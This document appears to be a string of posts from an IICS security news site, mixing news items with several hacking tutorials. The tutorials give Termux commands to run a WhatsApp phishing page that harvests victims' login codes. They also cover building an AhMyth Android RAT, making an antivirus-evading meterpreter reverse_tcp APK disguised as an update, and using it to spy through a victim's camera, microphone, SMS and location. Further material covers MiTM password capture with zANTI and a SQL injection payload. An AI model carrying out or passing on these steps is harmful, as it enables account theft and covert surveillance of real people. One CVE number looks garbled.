Using this tool, a hacker can crack passwords on Android and also change HTTP requests and responses, triggering wireless network compromise scenarios via an Android phone.

As usual, we remind you that this tutorial was prepared for informational purposes only and does not represent a call to action, so IICS is not responsible for the misuse that may be given to the information contained herein.

Before we continue, let’s take a look at all the actions we can take using ZANTI:

• Hack HTTP sessions using Man-in-The-Middle (MiTM) attacks
• Download capture
• Modification of HTTP requests and responses through MiTM attacks
• Router hijacking
• Password interception
• Scanning devices for Shellshock and SSL Poodle vulnerabilities
• Detailed nmap scanning

Installing ZANTI

Follow the steps listed by the experts in the Cyber Security 360 course to install ZANTI correctly:

• Go to the official website from https://www.zimperium.com/zanti-mobile-penetration-testing
• Enter an email address
• The download link will be available shortly
• Download the APK
• Select the option Install from unknown sources if necessary
• Install the APK
• Open the app, grant the required permissions and connect to a WiFi network

Let’s take a closer look at the features of the tool.

Hack HTTP sessions with MiTM

You can redirect all HTTP traffic to a specific server or site by default, as soon as the “HTTP Redirect” feature is enabled. You can also redirect it to a specific website by clicking on the settings icon, and then you will find a place to enter the URL.

Download capture

This feature allows you to connect to the host’s downloads folder and get a copy of all its contents. For example, if you select “.pdf” from the menu and click “Upload File”, all PDF files will be downloaded to your phone.

This tactic can be especially useful when it comes to social engineering, mention the experts of the Cyber Security 360 course.

Modification of HTTP requests and responses through MiTM attacks

Using zPacketEditor you can change http requests and responses on your network. It is an interactive mode that allows you to edit and submit each request and response. However, this is complicated and may not work on all phones.

Hijack routers

Router pwn is a web application for exploiting router vulnerabilities. This is a set of local and remote exploits ready to run.

For use, click on “Routerpwn.com”, then select your router provider; you can check for other vulnerabilities, so if you wish you can find out more about these flaws.

Password interception

This is the main feature of ZANTI and allows the capture of passwords in networks, mention the experts of the Cyber Security 360 course. For this, select the target device and click the MITM button; you can find the results in the saved passwords section.

Scanning devices for Shellshock and SSL Poodle vulnerabilities

First, select the device; click on “Shellshock/SSL Poodle” and you can scan the target device. Wait for a while and then get the result. If the device is vulnerable, you can use it.

nmap scanning

This feature gives you all the important sensitive information about the target and network, open ports, IP addresses, operating systems, etc. It can be very useful to find exploits and hacks related to our goal, mention the experts of the Cyber Security 360 course.

These have been some basic concepts for the use of the ZANTI tool, which can prove very useful for hacking Android devices over wireless networks.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and to learn more about the Cyber Security 360 course.

The post <strong>Tutorial for pentesting Android apps using the free ZANTI toolkit</strong> appeared first on Information Security Newspaper | Hacking News.

A growing trend within phishing is the compromise of WhatsApp accounts, the largest instant messaging platform in the world. Threat actors take advantage of the fact that minimal resources are required for the deployment of a phishing campaign against users of the application, using tools available in any forum of dubious reputation.

This time, the ethical hacking experts of the International Institute of Cyber Security (IICS) will show you a simple phishing attack to attack WhatsApp accounts, using just a few commands. As usual, we remind you that this article was prepared for informational purposes only and should not be taken as a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

This attack is based on Termux, the popular terminal emulator for Android devices that allows you to run a Linux environment on a smartphone with specific requirements. Once we have installed Termux, we will have to open the tool and write the following commands one by one (enter “y” when the system asks to choose between Y/N):

apt update
apt upgrade
apt install git
git clone https://github.com/Ignitetch/Whatsapp-phishing
apt install php
cd Whatsapp-phishing
php -S localhost:8080 

Next, experts in ethical hacking recommend typing in the browser the following command:

http://localhost:8080

The victim enters a number, for example:

+74959999999

In the next step, choose Sign In:

Now we must enter the code received in the phone number, for example 12345678

After logging in, it redirects the user to web.whatsapp.com:

Return to the terminal, ethical hacking experts mention:

Swipe right and in the window below, press New Session

On this menu, type the following command:

cat log.txt && cat logs.txt

In response, we will receive data from the victim:

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to hack WhatsApp easily with a very effective Termux WhatsApp phishing website appeared first on Information Security Newspaper | Hacking News.

The arrested individuals were found in raids deployed in Mumbai, Delhi, Gurugram and Jaipur. In addition to the arrests, authorities confiscated fifteen laptops and nine mobile phones.

On the scam, cybersecurity specialists mention that India has been experiencing problems related to online exam submission, with hacking groups dedicated to using remote access tools to present some evidence on behalf of individuals interested in obtaining jobs in the government and some private companies.

In a recently revealed incident, a group of scammers allegedly helped a candidate score 780 out of 800 on the Graduate Management Admission Test (GMAT), an unusually high rating but one that so far has not been proven fraudulent.

Authorities claim that this individual was in contact with Russian hackers and even visited Russia in 2018. This group would have accessed the exam systems through a remote access tool, which could not be detected by security measures on the affected systems.

Finally, hackers developed a tool to remotely access the online exam system developed by a reputable IT company.

“Members of this cybercriminal group collaborated with the lab owners, installed the tool over LAN, and then accessed the systems through remote access. They also opened several online testing laboratories for this purpose,” the authorities’ report concludes.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Hacking GMAT exam 780 out of 800: Police arrests a gang who worked with Russian hackers appeared first on Information Security Newspaper | Hacking News.

In announcing this move, former Justice Secretary Humza Yousaf mentioned that £2.7 million was authorized for the purchase of 7,500 allegedly hacking-proof phones. However, some prisoners discovered an effective method to release the restricted functions of these devices a few hours after they were handed over. At the moment it is unknown what method the prisoners used to hack these devices.  

A source in Scotland’s prison service says hundreds of prisoners used this hacked equipment to operate illicit activities, including drug sales and extortion, in complicity with individuals outside the prisons. It was also reported that some gangs inside the prisons managed to steal the devices that were given to other inmates, as the program did not include prisoners considered dangerous.

To make the problem more serious, prison officials say it’s impossible to detect with the naked eye which devices have been tampered with by hackers, so prisons must invest considerable resources to find those phones capable of making unauthorized calls abroad, so the problem can’t be addressed in a matter of a few days.

For now, it has been decided that access to these phones will be revoked for inmates who misuse the devices, in addition to stricter measures to prevent the smuggling of new devices into prisons. These permits may be revoked for one month, two months or permanently.

Despite these measures, some congressmen have requested that the use of these devices be eliminated completely, as they believe that they only cause more problems than they solve and there is no way that the prison administration can guarantee their correct use.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Thousands of hack-proof secure cell phones confiscated from Scotland prisons appeared first on Information Security Newspaper | Hacking News.

This time, specialists from the mobile security course of the International Institute of Cyber Security (IICS) will show you one of the most popular methods and tools for the attack of smart devices, used by the most recognized mobile hacking groups. To be specific, this tutorial details the creation of a remote access Trojan (RAT) for Android devices.

Remember that this article was prepared for informational purposes only and should not be taken as a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

How to create a Trojan for Android

Mobile hacking specialists point out that the term RAT can refer to any remote management utility, such as the popular TeamViewer software, employed in the IICS mobile security course. Although they have multiple legitimate uses, threat actors can use RAT tools to compromise all kinds of vulnerable systems.

AhMyth RAT is an open source application available only in beta. The tool is aimed at Windows users, but AhMyth fonts can also be downloaded from GitHub for UNIX-like platforms, mobile hacking experts note.

The function to create a RAT for Android with this program consists of two stages:  

• A server application that can be used to control an infected device and create APK files with malicious code. It was created in the Electron framework, developed on GitHub to create simple graphical applications
• An APK client to store the malicious code that allows remote access to the infected Android device. That is, the generated APK file will act as a backdoor

Installing AhMyth RAT

Experts in mobile hacking point out that this utility requires a Java virtual machine installed on our system; you can download these implementations from the official Java website.

Subsequently, we will have to download the AhMyth RAT binaries, available in the official repository of the project on GitHub. Experts recommend disabling the antivirus during the download process to avoid problems during installation.

Create a malicious APK

To create an Android APK file, open the APK Builder tab. The appearance of the constructor to create a RAT for Android is shown below:

It is very easy to use the AhMyth RAT constructor. In the source IP window, you need to enter the IP address of the attacking machine:

In the Source port field, you can specify the port that the machine will reserve to listen for connections (the default port is 42,474). There’s also a Bind with Another APK option that allows you to link an APK file to another app, mobile security course specialists note.

To do this, check the Bind with Another APK box, select the required APK and specify the method to integrate the malware into the phone. There are two methods: running an infected APK or restarting the phone after installing the RAT. The creators of the tool recommend implementing the second option.

Then click the Generate button; by default, the infected file is saved in the following folder:

C:\Users\<Your_Username>\AhMyth\Output

How to avoid antivirus solutions

Android antivirus evasion is one of the most difficult tasks in mobile hacking, or at least it is for the uninitiated. To this end, we will use a tool known as APKWASH, capable of hiding malicious apps so that most antivirus solutions cannot detect the payload of the attack.

Download the APKWASH tool and clone it in Kali Linux using the following command:

git clone https://github.com/jbreed/apkwash.git

Grant running permissions to the tool with the following command:

chmod + x apkwash
mv apkwash / usr / local / bin / 

Now we can use the following commands to explore the functions of the tool, mention the experts in mobile hacking:

• -p | –Payload <payload>Sets the payload that msfvenom will generate
• -о | –Output <outfile.apk> Sets the name of the generated APK as well as the output APK file
• -x | –Original <infile.apk> The APK in which the payload will be inserted
• -g | –Generate Sets the payload using default values
• –n | –Newkey Generates a new debug key before signing
• -v | –Verbose Do not mask the output of the command
• -d | –Debug Leaves/tmp/ payload files instead for viewing
• –h | Help

apkwash -p android / meterpreter / reverse_tcp LHOST = 192.168.0.12 LPORT = 1337 -o update.apk

It now has a malicious APK that antivirus solutions won’t be able to detect.

With the right experience, you will be able to improve the tool on your own, mention the experts in mobile hacking.

Distribution of the RAT for Android

Malicious apps are easily detected by the security mechanisms of the Google Play Store, so it is necessary to find another method of distribution. Usually these APKs are distributed through social engineering campaigns, since it is also required to activate the RAT after installing the malicious application, so this stage of the attack must be taken into account, mention the experts in mobile hacking.

The success of the attack also requires that the “Install only from trusted sources” option be disabled, allowing you to install applications available from unofficial sources.

Connecting to affected devices

For the next stage of the attack, go to Victims and drive the same port to the field we indicated above, so that the server waits for the connections of the infected devices. Again, if nothing changed when compiling the APK, you also don’t need to specify anything here.

Click Listen, and if the malicious APK has successfully infected a mobile device, we will see a new connection.

The program also records all actions on the console located at the bottom of the window. The meaning is self explanatory; nonetheless, let’s review the details below:

• Country: Location where the infected device is working
• Manuf: Device manufacturer
• Model: code or model name of the device.
• Release: the operating system version of the infected device (in my case, it is Android 10).
• IP/Port: IP address and port of the device through which the infected device connects to the attacking machine

Once we have familiarized ourselves with these concepts, we can go to the Open The Lab section. In this menu, we will find seven additional options that give access to various functions of the program.

Camera

First, let’s take a look at the Camera section. Select the camera: front (front) or main (rear), and you can take a photo by pressing the Snap button.

File Manager

This tool is not as advanced as in other RAT developments, mention the experts of the mobile security course, although it is still really useful. Using this tool, it is possible to download the files stored on the infected device; as you can see, the home directory is the root directory and can only be accessed with administrator rights.

Microphone

This feature allows you to use the device’s microphone in the background and record any possible record in a matter of seconds. Then press Record and wait; the resulting file can be listened to directly in the program window or saved on your machine.

Location data

This is one of the main functions of AhMyth. If the transmission of location data is enabled on the infected device, we will be able to successfully know the precise location of the affected users, with a margin of error of about 10 meters.

Contacts

With this feature, it is possible to extract the entire list of contacts registered on the victim’s phone, mention the mobile hacking experts.

SMS Messages

With this feature, users can send SMS messages to other users and even view and download all the messages that came to this device. To send an SMS, go to the Send SMS tab, specify the recipient’s phone number (TO field: //), and in the Message field, enter the text of the desired message. After that, all that’s left is to hit the SEND button.

Call log

This section allows you to view the phone call history on the affected user’s device. Using this feature, threat actors can find details such as contact name, phone number, call duration, and type of entry (either incoming or outgoing).

Conclusions

Mobile hacking experts consider this tool to be extremely useful and can help in a wide variety of situations, making it very popular among some cybercriminal groups. In this situation, it is best for users to avoid installing apps downloaded from unofficial platforms, since this is the main way of attacks with Trojans for Android.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Here’s how hackers remotely attack smartphones: Taking control of victim’s camera and microphone using just 11 commands appeared first on Information Security Newspaper | Hacking News.

It is worth noting that Huawei launched AppGallery after Donald Trump’s administration banned this and other Chinese tech companies in the U.S. from accessing U.S. technology, including the Android operating system. Due to this decision, all Huawei smartphones work with their own operating system and can only access the apps available in their own app store.

According to the experts, when installed, compromised applications require multiple permissions, including the ability to make and manage phone calls. If the user grants these permissions, apps begin collecting system data and sending it to a server controlled by the attackers, including phone number, location details, mobile operator, and other records.

Regarding the compromised apps, the researchers point out that these include emulators and mobile games of various genres, some even aimed at children and adolescents, which increases the risk of access to sensitive information. The apps also targeted a variety of nationalities by detecting language and localization settings, primarily affecting users in China and Russia.

The researchers concluded their report by listing some indicators of compromise, including shorter battery life, appearance of unknown icons, system slowdown and appearance of invasive advertising.

Upon receiving the report, Huawei decided to remove nearly 200 potentially compromised applications, in addition to new security measures for the inclusion of new software in AppGallery in the future. At the moment it is unknown if the company took any action against the developers of these applications.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post New research: Millions of Huawei smartphones are inflected with malware appeared first on Information Security Newspaper | Hacking News.

WhatsApp is the world’s most popular messaging platform, with around 1.5 billion active users a month sending text messages, voice notes, multimedia content and PDF files from virtually everywhere. Although it was created by developers Brian Acton and Jan Koum, a couple of years ago WhatsApp was bought by Facebook, extending its dominance on digital platforms.

Due to its popularity, WhatsApp has become one of the favorite targets of threat actors, who have spent years trying to find the best method to compromise accounts on this platform.

Despite counting as end-to-end encryption, preventing actors outside the conversation from accessing messages, WhatsApp is affected by various security flaws that can be exploited by threat actors, as user-backed information is not protected by end-to-end encryption or other security variants.

On this occasion, the experts in mobile hacking of the International Institute of Cyber Security (IICS) will show you the most popular methods to hack WhatsApp accounts, in addition to listing some tips to prevent these attacks. As usual, we remind you that this article was prepared for informational purposes only, so IICS is not responsible for the misuse that may be given to the information contained herein.

HOW TO HACK WHATSAPP ACCOUNTS

Phishing

This is a malicious practice in which hackers try to obtain sensitive information from a vulnerable user, including login credentials and browser cookies. In the case of WhatsApp, experts in mobile hacking mention that phishing focuses on stealing the QR code to log in to WhatsApp Web in order to steal the credentials of the web client.

Hackers use node.js and socket.io for the target website, deploying a cross-site scripting (XSS) attack in order to launch a new browser and connect with web.whatsapp.com. The hackers will then obtain the QR code data and send it to the client via the web socket connection. When the QR code is scanned, WhatsApp will authenticate the selenium-controlled browser and store some tokens in the local storage and document cookie.

Keyloggers

Hackers can also use advanced tools to record each key pressed by the target user in order to extract their WhatsApp passwords. These tools, known as keyloggers, must be inadvertently installed on the target system so that the user has no knowledge that he is being spied on, as mention by the experts in mobile hacking.

When the target user opens WhatsApp on their phone, the keylogger starts collecting all the information entered into the device and stores it so that hackers can access the logs easily. There are several types of keyloggers available on the network, so threat actors have no major problems using these tools.

Mobile hacking

Mobile hacking tactics allow threat actors to give detailed tracking to the target user. Employing these methods, hackers can access detailed information such as call history, text messages, and list of installed apps, including WhatsApp.

According to experts in mobile hacking, this application is easily hackable using sophisticated cyberespionage tools . The good news is that these tools are very expensive and not available to any user.

SS7 attacks

Signaling System 7 (SS7) is a telecommunications standard responsible for defining how a telephone network exchanges information over a digital network. SS7 is in charge of number translation, billing, SMS message services, among other telecommunications services, mention experts in mobile hacking.

Threat actors can abuse known SS7 vulnerabilities in order to trick a telecommunications network into believing that the attacker’s phone has the same number as the victim’s. If the attack is successful, the hacker will be able to spy on the legitimate user by logging into a device other than the original; in other words, the hacker will be able to use the compromised account as if it were the affected user.

Session hijacking

This attack consists of taking control of the session on a valid device, gaining unauthorized access to sensitive information. According to mobile hacking specialists, this attack is more likely when using WhatsApp Web even though the service notifies users when a second active session is detected.

Despite the security measures on the platform, most users do not pay much attention to hints of malicious activity, so they could inadvertently confirm hackers’ access to their accounts on the messaging platform.

Social engineering

Not all hacking techniques involve the use of complex intrusion schemes and sophisticated security tools, as threat actors have multiple methods to get what they want without even using malicious code.

Social engineering is based on the extraction of confidential information through deception, saturating the user with messages, phone calls or emails in which they are offered fake products or services to gain the trust of victims and force the delivery of confidential information, in this case passwords and WhatsApp authentication codes.

WhatsApp Hack Tool

For some years now, various cybercriminal groups have been dedicated to the development of hacking tools to extract information from WhatsApp. One of the most famous examples is WhatsApp Hack Tool, a tool sold on the dark web, easy to use, with advanced features to compromise accounts on the messaging platform and that also works for both iOS and Android.

Experts in mobile hacking claim that this tool works thanks to the recreation of a security bug in the WhatsApp database. The hackers created a “worm” that goes unnoticed by almost any security solution, allowing the full compromise of the affected account.

DNS spoofing

In this attack, hackers must direct the target user to a legitimate-looking malicious website, divert web traffic, and steal login credentials. While this isn’t the stealthiest attack on this list, threat actors can go unnoticed for a long time.

Once a human language is entered into the computer, a DNS server finds the real IP address and then redirects the request from the user’s browser to the real machine based on the IP address. Ultimately, hackers employ this attack technique to hijack the real address of the WhatsApp website and redirect it to another IP address controlled by the attackers.

Using Firesheep

Firesheep is a tool capable of a packet sniffer to intercept unencrypted session cookies from websites such as Facebook and Twitter. According to experts in mobile hacking, this tool only works when the attacker and the victim are connected to the same network, since this condition facilitates the interception of cookies to improperly access the user’s WhatsApp account.

WHATSAPP SECURITY

As we can see, threat actors have multiple resources at their disposal to compromise WhatsApp accounts, so users should keep their devices and online accounts secure enough to prevent most conventional hacking attempts.

Among the best security measures for WhatsApp are:

• Avoid using unsupported versions of WhataApp
• Make sure your messages are not copied to Google Drive or iCloud
• Enable multi-factor authentication on your online accounts
• Avoid connecting your devices to public WiFi hotspots as they are very insecure
• Do not share personal information with anyone, especially by phone or email
• Avoid installing mobile apps from unofficial platforms
• Always log out of WhatsApp Web when you finish using the platform
• Keep your WhatsApp app always up to date

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to hack WhatsApp in 2021 and how to protect it so that nobody can spy on your messages appeared first on Information Security Newspaper | Hacking News.

This emergency update addresses a total of 40 flaws, of which 37 are iPhone-only. The most severe of these vulnerabilities would allow remote threat actors to execute arbitrary code with root user privileges on the affected devices.

As of now Apple considers that there are no reports of active exploitation, although the risk to government agencies is considered critical, so it is necessary to update as soon as possible.

Some of the major security patches address flaws that reside in WebKit, the Safari browser engine. All four vulnerabilities (CVE-2021-30758, CVE-2021-30795, CVE-2027-30797, and CVE-2021-30799) exist due to type confusion errors, use-after-free errors, and memory corruption flaws.

Apple’s report includes a list of the 40 flaws addressed in this emergency update.

Beside the updates, Apple issued a list of security recommendations to mitigate exploitation risk, which includes:

• Run any tool as non privileged user
• Avoid downloading files or applications from unknown sources
• Do not visit platforms of suspicious appearance or dubious reputation

While the update was released earlier this week, the company kept technical details about these flaws undisclosed due to the risk of latent exploitation. It should be remembered that this is a standardized technique in the cybersecurity community to prevent the massive exploitation of zero-day flaws.

For the cybersecurity community, this is a network flag that Apple should seriously consider and not just fix the flaws detected to iMessage. Dirk Schrader, cybersecurity specialist, believes: “No device or operating system is 100% free from failures; this is a clear example that Apple needs to rethink its current approach to security, which researchers, manufacturers and users often consider more secure than their counterparts.”

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post New urgent iPhone update can’t protect you from Pegasus spy software appeared first on Information Security Newspaper | Hacking News.

Authorities in the Brazilian state of Sao Paulo announced the arrest of multiple individuals identified as members of a gang dedicated to stealing and hacking iPhone devices in order to access victims’ online banking accounts and steal all their money. Authorities consider this to be a highly sophisticated criminal group, capable of bypassing the complex security mechanisms implemented by Apple, including multi-factor authentication, access passwords and biometric recognition.

This criminal group was not limited to stealing iPhone devices, as they were also interested in obtaining iPads and smartphones with recent versions of the Android operating system.

Roberto Monteiro, delegate of the Police of Sao Paulo, mentions that this gang unlocks the stolen devices using tools available on the dark web, and then extracts as much information as possible from the device, including credentials for access to banking platforms: “From the moment an iPhone is unlocked, hackers try to determine what is the most important information stored on the device”, mentions Monteiro.

During the last weeks, the local newspaper Folha de Sao Paulo gave an important follow-up to the reports related to this hacking gang, pointing out that its activity extends throughout the central region of the city, even reaching territories bordering other states. One of the most notorious incidents related to these attackers is related to an Uber driver, who saw the R67,000 (more than $12,000 USD) in his bank account disappear after a couple of young individuals stole his iPhone.

After multiple reports the Brazilian police began to implement Operation Meucci, named after the Italian Antonio Santi Giuseppe Meucci, inventor of the closest antecedent to the modern telephone. One of the first steps of this operation involved the detection of potential suspects. After initial inquiries, authorities determined that one of the main operators of this gang was an individual from Guinea-Bissau, responsible for a circuit of surveillance cameras in the gang’s area of operation. These activities were carried out from a building in the center of the city, which functioned as a base of operations for hackers.

A series of undercover surveillance operations allowed authorities to identify some individuals close to the main suspect, which eventually turned into obtaining arrest warrants. Sao Paulo police also conducted raids, during which multiple stolen smartphones and other electronic devices allegedly used to unlock the devices and extract sensitive information were seized.

The authorities complied with a total of 17 arrest warrants, thus materializing more than 6 months of investigation involving 80 civilian agents, 38 vehicles and 10 search teams.

Police IT investigation area mention that the method employed by this gang is new and very efficient. This process involves changing the device chips, obtaining useful information to access the desired information, and then restoring the device to its original state.

Agents of the Research Department of Sao Paulo mention that in past years there had already been reports of groups capable of unlocking smartphones, especially iPhone devices, using advanced software variants. The arrest of this gang seems to confirm the existence of this technology.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post This gang was able to unlock stolen iPhone/iPad with the latest iOS and bypass Face ID, Touch ID, passwords and steal money from banking apps. They were finally arrested appeared first on Information Security Newspaper | Hacking News.

In this article, pentesting specialists from the International Institute of Cyber Security (IICS) will show you the best 14 apps to perform basic security scans from a mobile device running Android operating system. It is important to note that it is possible to perform some hacking tasks from our smartphone; we only have to learn to distinguish between the really useful tools and the junk apps that abound on platforms like Google Play Store.

HACKING VIA SMARTPHONE TOOLS

Pentesting experts classify hacking apps for Android into the following categories:

• Web resource scanners: These are hacking tools to find vulnerabilities in web applications
• Combinations: Allow users to search for hardware and software vulnerabilities to exploit them. These tools let deploying tracking attacks, Man-in-The-Middle (MiTM) attacks, among other hacking variants
• Trackers: These are hacking apps to intercept and analyze target user’s traffic
• Help utilities: Support tools during pentesting
• Directories and search engines: Applications that perform auxiliary functions

Let’s look at some good examples of these tools.

WEB RESOURCE SCANNERS FOR ANDROID

Web application scanners are probably the most important mobile hacking resource, as mentioned by pentesting experts. Here are three applications that will allow you to find open management dashboards, reset passwords, as well as testing any website for XSS vulnerabilities, SQL injection capabilities, directory list compilation, and more.

Kayra the Pentester Lite

Kayra the Pentester Lite is a vulnerability scanner to analyze the configurations of a specific web server that attempts to obtain a list of directories and includes additional tools, such as hashing generators and AES decryptors, as mentioned by pentesting experts.

The application has simple and direct configurations. It supports HTTPS and validates TLS, plus it is capable of searching for XSS, brute force flaws and performing dictionary attacks. It can work in the background and in multithreaded mode. It contains the Google Hacks database and automatically detects known vulnerabilities. The free version is quite functional, but if you want to get rid of the ads the paid version is accessible. The latest version of Kayra the Pentester Lite (v1.4.0) requires only 4.7 MB and works on any Android 4 device without rooting.

DroidSQLi

DroidSQLi allows you to verify websites for SQL injection vulnerabilities in different variants:

• Normal SQL Injection: The classic version with the union ALL SELECT parameter step
• Error-based SQL injection: Conscious use of incorrect query syntax to receive an error message that reveals additional database parameters
• Blind SQL Injection: A series of queries that analyze true or false DBMS responses, allowing you to restore the database structure
• Time-based SQL injection: the formation of additional queries that cause the DBMS to be suspended for a certain period of time, making it possible to retrieve the data character by character

This utility automatically selects the injection method and also uses techniques to bypass query filtering. To start testing the site, you must manually search for the entry point. Typically, this is the address of a web page that contains a query such as Id x or P x, where X is a positive integer. In our example, the payload of the ID parameter looks like this:

id=(SELECT 4777 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4777=4777,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

There are many websites that are vulnerable to SQL injection and it is best to find these flaws through a browser search.

This utility does not require a rooted smartphone and works on all Android versions later than 5.2.

Droidbug Admin Panel Finder FREE

This application searches management panels by default addresses of different CMSs. The result of this work does not always correspond to the actual state of things, as IDS and WAF are installed on popular web servers and have better security mechanisms. 

Despite this, on less popular sites with poorer security measures everything is very grim and you will find a valid admin panel in a matter of seconds. The paid version removes ads and unlocks the ability to use brute force attacks in a mixed pattern for sites with PHP/ASP/CGI/CFM/JS support.

The latest version of Droidbug Admin Panel Finder FREE needs only 6.4 MB and does not require rooted devices.

COMBINATIONS TO HACK FROM A SMARTPHONE

The Internet isn’t just about web applications. The following collection of hacking apps for Android will allow you to search for vulnerabilities in software and hardware, perform sniffing, MiTM attacks, and backdoors, among other variants.

cSploit

This is one of the most powerful tools for scanning networks and finding vulnerabilities on detected hosts. Experts can use cSploit to draw a network map and find information about all connected devices.

The tool also allows you to determine the IP/MAC and provider, determine the operating system, look for vulnerabilities using the Metasploit RPCd framework and obtain passwords using brute force.

The latest version (v1.6.6 RC2) requires 3.5 MB and works on all Android versions later than 2.3, although it should be noted that cSploit requires a rooted device to properly work.

dSploit

If cSpoit worked for me smoothly, the last three versions of dSploit failed with an error almost immediately after release. Since developer Simone Margaritelli got a job at Zimperium, dSploit’s developments have become part of zAnti’s proprietary utility.

This utility requires a rooted Android device to work properly.

zANTI

This is a mobile pentesting app developed by Zimperium whose interface is divided into two parts: Scanning and Man-in-The-Middle (MiTM). A separate function allows users to identify vulnerabilities in the pentesters’ own smartphone.

This tool helps researchers to hack routers and get full access to them. Using MiTM attacks, zAnti detects unsecured items at three levels: in the operating system, applications, and device settings.

Finally, the tool prepares a report that contains explanations and tips on how to eliminate the detected flaws. Like other tools in this list, zANTI requires a rooted device.

SNIFFERS TO INTERCEPT TRAFFIC ON ANDROID

No pentester can do without good sniffer software, pentesting experts mention. Therefore, the next section of the article is dedicated to applications for intercepting and analyzing target user traffic.

Intercepter-NG

This is an advanced tracker for MiTM attacks. Intercepter-NG captures traffic and analyzes it on the fly, automatically detecting the authorization data contained.

The tool automatically detected data formats include passwords and hashes for the following protocols: AIM, BNC, CVS, DC++, FTP, HTTP, ICQ, IMAP, IRC, KRB5, LDAP, MRA, MYSQL, NTLM, ORACLE, POP3, RADIUS, SMTP, CALCETINES, Telnet, and VNC.

This app works on any Android device after v2.3, although it is important to mention that a rooted device is required, as mentioned by pentesting experts.

Packet Capture

This is a simple and legal TCP/UDP packet analyzer with the ability to intercept HTTPS sessions using MiTM. Using this tool does not require root rights as it uses Android’s built-in feature to send traffic over a VPN and forge an SSL certificate.

Packet capture works locally and does not perform ARP impersonation, session hijacking, or other attacks on external hosts. The application is positioned as a proxy to debug and downloaded from official websites.

HELP UTILITIES

While advanced pentesting utilities require rooted devices and other tools, there are simpler apps available in the Play Store and work on any smartphone, pentesting experts mentioned.

WPSapp

This program scans for WPS-enabled access points. After finding them, it tries testing the default pins on them. They are few and are known from router manufacturers’ manuals.

If the user did not change the default pin and did not turn off WPS, then the utility will review all known values and get WPA(2)-PSK, no matter how long and complex. The wireless password is displayed on the screen and is automatically saved in the WiFi settings of the attacking smartphone.

This tool works on all versions of Android after 5.1 and, although it does not necessarily require a rooted device, its operation could improve in case of using a jailbreak.

WiFiAnalyzer

This is a free and open source WiFi scanner very useful for detecting access points, knowing their parameters, measuring the signal strength and the distance between the different WiFi points.

WiFiAnalyzer allows you to view connection status, filter targets by signal strength, SSID, frequency used (2.4/5 GHz) and encryption type. You can also manually determine the least saturated channel using the available graphs, mentioned by pentesting specialists. Using this tool does not require a rooted device and works on any version of Android higher than v4.1.

Fing

Fing is a tool available on the Google Play Store to perform quick scans of the WiFi network to which our device is connected, identifying all users connected to this access point. Although the main use of this tool is to analyze our own WiFi network, Fing has other very attractive options.

Its Premium version can perform advanced analysis of the NetBIOS, UPNP, and Bonjour names, so you can fully identify the types of devices connected to a network, as well as having built-in ping and traceout utilities and sending Wake on LAN (WOL) requests, cybersecurity experts mention.

As it is an application available on official platforms, users do not require a rooted device to access all Fing features.

NetCut

This app detects all devices connected to a wireless network, as well as using advanced mechanisms to eject intruder devices or even restrict full access to the administrator’s WiFi network.

The app requires only 12 MB and works on any version above than 4.0, although a rooted device is required.

DIRECTORIES AND SEARCH ENGINES FOR PENTESTING               

Finally, we’ll address a couple of utilities that, while not directly related to hacking activities, perform helper functions to develop this kind of testing.

Droidbug Exploiting FREE

This utility was designed to find and download various types of exploits, grouped into two categories: local execution and remote execution. A separate group includes hardware and web vulnerabilities, as well as those used in denial of service (DoS) attacks.

This tool can be run by any version of Android greater than 4.0.3, although its execution requires a rooted device.

Pentest Chearsheet

According to pentesting specialists, this is a complete guide to running security tests according to The Open Web Application Security Project (OWASP) guidelines.

This guide includes a selection of links to hacking utilities tested and grouped according to the task in question, be it online scanning, vulnerability analysis, reverse tools, fuzzers, trackers, among others. This utility weighs only 2.2 MB and works on all Android versions greater than 4.0, plus no rooted device is required for use.

Remember that this material was developed for entirely academic purposes, so its misuse is not the responsibility of IICS. To learn more about computer security risks, malware, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) website.

The post Top 15 hacking tools for doing penetration testing from mobile phones appeared first on Information Security Newspaper | Hacking News.

Reports indicate that the malware was detected in the code of an app called “System Update”, which requested its download and installation outside of Google’s official platforms, including the Play Store. If users fell into the trap and installed this update, the malicious code would hide its icon and start extracting information from the device to send it to the attacking servers inadvertently.

The report, prepared by security firm Zimperium mentions that at the end of the installation, the malware establishes communication with the hackers’ Firebase server, used to remotely control the compromised smartphone.

Among the capabilities of this malware are messages and contact lists theft, collection of details about the infected device, browser preferences and search history, phone call recording and screenshot stealing. This malware could also extract the user’s location details and copy documents in various formats. To make it difficult to uninstall, the malware hides its processes by reducing the amount of network data consumed, as well as hiding its icon on the victim’s screen.

According to Shridhar Mittal, director of Zimperium, this malware could be part of a malicious campaign targeting specific users, as well as pointing out the complexity of the attack: “It’s one of the most sophisticated attacks we’ve found; operators devoted significant resources to this operation and it is highly possible that they have created other similar applications that we should detect as soon as possible.”

Moreover, Zimperium mentions that it is relatively easy to trick a user into installing the malicious app on their device, as it is enough to redirect potential victims to websites of dubious reputation but attractive to the eye. The main recommendation to prevent these cases of infection is not to install apps hosted on non-Google platforms, in addition to keeping their apps always up to date to the latest version, which ensures the user is protected against the latest trends in mobile hacking.

A subsequent Google report also confirmed that this app was never available on its official platforms, so infected users had to download it from some illegitimate platform. It should be remembered that in the past other malicious apps have managed to sneak into Google Play Store, so it is necessary to take all necessary precautions before installing a new app on our devices.

